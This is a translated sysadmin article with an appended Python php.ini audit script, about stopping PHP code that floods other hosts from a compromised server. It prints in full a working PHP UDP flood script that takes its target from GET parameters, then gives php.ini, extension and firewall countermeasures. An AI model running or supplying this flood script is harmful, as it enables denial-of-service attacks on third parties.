Preventing users from exhausting the server's network bandwidth with PHP DoS code

  • 2020-03-31 21:35:55
  • OfStack

PHP code that calls sockets can use the server's network directly to attack other IPs. Common code looks like this:
 
$packets = 0; 
$ip = $_GET['ip']; 
$rand = $_GET['port']; 
set_time_limit(0); 
ignore_user_abort(FALSE); 
$exec_time = $_GET['time']; 
$time = time(); 
print "Flooded: $ip on port $rand 
"; 
$max_time = $time+$exec_time; 
for($i=0;$i<65535;$i++){ 
$out .= "X"; 
} 
while(1){ 
$packets++; 
if(time() > $max_time){ 
break; 
} 
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5); 
if($fp){ 
fwrite($fp, $out); 
fclose($fp); 
} 
} 
echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n"; 
?> 

Symptoms:
Once IIS is started, the server's outbound bandwidth is used up; that is, the server is constantly sending packets to others. This differs from being the target of a DDoS attack, where the server is constantly receiving a large number of packets.
Solutions:
Disable the above code:
In c:\Windows\php.ini set:
disable_functions = gzinflate
In c:\Windows\php.ini set the following value to Off:
allow_url_fopen = Off
And:
;extension=php_sockets.dll
The leading ; must be present; it means the sockets extension is disabled.
Then restart IIS.
If this still doesn't work, you can disable the PHP extension in IIS, under the allowed extensions, as a test.
In addition, for unencrypted PHP attack code, you can also use the following methods:
1. In the IP security policy or the firewall, block all outgoing UDP traffic.
2. Monitor with the "first-class information" monitoring tool: in its SQL interception and address interception settings, intercept the keyword port=
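An added example, not part of the original article: a Python check that reads php.ini text and reports which of the settings above are in place, and whether the functions the script above calls (fsockopen, set_time_limit) are listed in disable_functions. The names parse_ini and audit and the sample ini texts are constructed for this example.

```python
# Functions the script on this page calls. Treating these as the ones to list
# in disable_functions is an assumption of this example, not the article's advice.
SCRIPT_FUNCS = {"fsockopen", "set_time_limit"}
OFF_VALUES = ("off", "0", "false", "no", "")

def parse_ini(text):
    """Return (directives, loaded extensions) from php.ini text, skipping ';' comments."""
    directives, extensions = {}, set()
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "[")):
            continue                      # comment, section header or blank line
        key, sep, value = line.partition("=")
        if not sep:
            continue
        key = key.strip()                 # directive names are case sensitive
        value = value.split(";", 1)[0].strip().strip('"')
        if key == "extension":
            extensions.add(value.lower())
        else:
            directives[key] = value       # a later line overrides an earlier one
    return directives, extensions

def audit(text):
    """Return a list of findings; an empty list means every check passed."""
    d, ext = parse_ini(text)
    disabled = {f.strip().lower()
                for f in d.get("disable_functions", "").split(",") if f.strip()}
    findings = []
    if d.get("allow_url_fopen", "1").lower() not in OFF_VALUES:
        findings.append("allow_url_fopen is enabled")
    if ext & {"php_sockets.dll", "sockets"}:
        findings.append("sockets extension is loaded")
    for func in sorted(SCRIPT_FUNCS - disabled):
        findings.append(f"{func} is not in disable_functions")
    return findings

# Constructed sample inputs.
ARTICLE_INI = "disable_functions = gzinflate;\nallow_url_fopen = Off\n;extension=php_sockets.dll\n"
STOCK_INI = "allow_url_fopen = On\nextension=php_sockets.dll\ndisable_functions =\n"
STRICT_INI = ("disable_functions = gzinflate,fsockopen,set_time_limit\n"
              "allow_url_fopen = Off\n;extension=php_sockets.dll\n")

if __name__ == "__main__":
    for name, ini in (("article", ARTICLE_INI), ("stock", STOCK_INI), ("strict", STRICT_INI)):
        print(name, audit(ini) or "no findings")
```

fsockopen is a core PHP function rather than part of the sockets extension, which is why the first sample still reports it; blocking outgoing UDP at the firewall (method 1 above) covers that case independently of php.ini.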
